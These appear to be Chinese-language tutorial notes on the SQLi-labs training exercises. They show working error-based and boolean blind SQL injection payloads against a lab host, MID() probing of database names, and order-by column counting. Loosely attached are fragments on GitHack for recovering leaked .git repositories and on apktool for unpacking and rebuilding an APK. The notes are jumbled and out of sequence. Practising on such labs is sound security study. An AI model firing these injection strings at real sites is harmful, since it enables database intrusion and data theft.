下面使用报错盲注来演示
sql语句:
1 | union Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a |
请求payload:
1 | http://47.101.62.20:11567/Less-5/?id=1%27%20union%20Select%201,count(*),concat(0x3a,0x3a,(select%20user()),0x3a,0x3a,floor(rand(0)*2))a%20from%20information_schema.columns%20group%20by%20a--+ |
sql语句:
我们从这这一关开始学习盲注。结合 background-2 的信息,将上述能使用的 payload 展示
一下使用方法。
这里说一下,有很多的 blog 是翻译或者 copy 的,这关正确的思路是盲注。从源代码中可以
看到,运行返回结果正确的时候只返回 you are in….,不会返回数据库当中的信息了,
所以我们不能利用上述 less1-4 的方法
1 | http://47.101.62.20:11567/Less-5/?id=1%27and%20left(version(),1)=5--+ |
查看一下 version(),数据库的版本号为 5.6.17,这里的语句的意思是看版本号的第一位是
不是 5,明显的返回的结果是正确的。
当版本号不对的时候,则显示为空
盲注就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显
到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。
从background-1 中,我们可以知道盲注分为三类 基于布尔SQL盲注、基于时间的SQL盲注、基于报错的SQL盲注。
此函数为截取字符串一部分。MID(column_name,start[,length])
| 参数 | 描述 |
|---|---|
| column_name | 必需。要提取字符的字段 |
| start | 必需。规定开始位置(起始值是 1) |
| length | 可选。要返回的字符数。如果省略,则 MID() 函数返回剩余文本 |
示例:
1 | MID(DATABASE(),1,1)>’a’ //数据库名第一位 |
查看数据库名第一位的ASCII值是否大于a。返回true或flase
http://47.101.62.20:11567/Less-1/?id=1 后面直接添加一个’,报错
依次请求order by 1,2,3,4直到报错。
1 | http://47.101.62.20:11567/Less-1/?id=1%27order%20by%204--+ |
证明有三个字段
此处介绍一些mysql注入的基础知识
一阶注射是指输入的注射语句对 WEB 直接产生了影响,出现了结果;二阶注入类似存
储型 XSS,是指输入提交的语句,无法直接对 WEB 应用程序产生影响,通过其它的辅助间
接的对 WEB 产生危害,这样的就被称为是二阶注入
以下需要用到python脚本:Githack
https://github.com/BugScanTeam/GitHack
查看历史记录
1 | git log |
切换版本
1 | git reset |
对比两次提交
下载地址:https://ibotpeaches.github.io/Apktool/install/
apktool d qipai.apk
apktool b test
